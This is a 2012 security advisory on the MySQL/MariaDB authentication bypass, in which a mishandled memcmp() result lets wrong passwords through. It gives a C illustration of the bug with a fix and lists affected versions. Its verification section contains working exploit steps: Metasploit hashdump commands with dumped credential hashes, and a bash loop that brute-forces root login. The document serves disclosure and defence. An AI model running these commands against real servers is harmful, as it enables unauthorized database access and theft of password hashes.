MySQL probabilistic login vulnerability with an arbitrary password for any user - Vulnerability Warning - Black Bar Security Net

2012-12-20T00:00:00
ID MYHACK58:62201236272
Type myhack58
Reporter Anonymous
Modified 2012-12-20T00:00:00

Description

When a client connects to MariaDB/MySQL, the password it supplies is compared with the expected correct password. Because the result of that comparison is handled incorrectly, MySQL can treat the two passwords as identical even when memcmp() returns a non-zero value.

In other words, anyone who knows a user name can log in directly to the SQL database simply by trying repeatedly. According to the bulletin, about 256 attempts are enough to guess right once. An exploit tool has already appeared.
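An added example, not code from the advisory or from MySQL/MariaDB, showing one way a non-zero memcmp() result ends up read as "equal": the int is narrowed to a one-byte boolean, so any result whose low 8 bits are zero becomes 0. The names bool8, wide_memcmp, check_vulnerable and check_fixed and the sample digests are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>

typedef char bool8; /* hypothetical one-byte boolean type */

/* Hypothetical memcmp-compatible routine: compares two bytes at a time and
   returns the difference of the first differing big-endian 16-bit words.
   That is permitted, because the C standard fixes only the sign of the
   result, not its magnitude. */
static int wide_memcmp(const void *a, const void *b, size_t n) {
    const unsigned char *p = a, *q = b;
    size_t i = 0;
    for (; i + 1 < n; i += 2) {
        int x = (p[i] << 8) | p[i + 1], y = (q[i] << 8) | q[i + 1];
        if (x != y) return x - y;
    }
    return (i < n) ? p[i] - q[i] : 0;
}

/* Vulnerable pattern: 0 means "match", but the int is narrowed to one byte,
   so a result such as 256 or -512 is read back as 0. */
bool8 check_vulnerable(const unsigned char *want, const unsigned char *got, size_t n) {
    return (bool8)wide_memcmp(want, got, n);
}

/* Hardened form: reduce the result to 0 or 1 before it is narrowed. */
bool8 check_fixed(const unsigned char *want, const unsigned char *got, size_t n) {
    return (bool8)(wide_memcmp(want, got, n) != 0);
}

/* Constructed sample digests. They differ, and the first differing words are
   0x0200 and 0x0100, so wide_memcmp() returns 256. */
static const unsigned char WANT[4] = {0xAA, 0xBB, 0x02, 0x00};
static const unsigned char GOT[4]  = {0xAA, 0xBB, 0x01, 0x00};

int vulnerable_accepts_mismatch(void) { return check_vulnerable(WANT, GOT, 4) == 0; }
int fixed_accepts_mismatch(void)      { return check_fixed(WANT, GOT, 4) == 0; }

int main(void) {
    printf("vulnerable accepts mismatch: %d\n", vulnerable_accepts_mismatch());
    printf("fixed accepts mismatch:      %d\n", fixed_accepts_mismatch());
    return 0;
}
```

The same rule applies to any comparison result that feeds an authentication decision: test it against zero explicitly before storing it in a narrower type.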

Affected products: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

Verification method:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

$ for i in $(seq 1 1000); do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>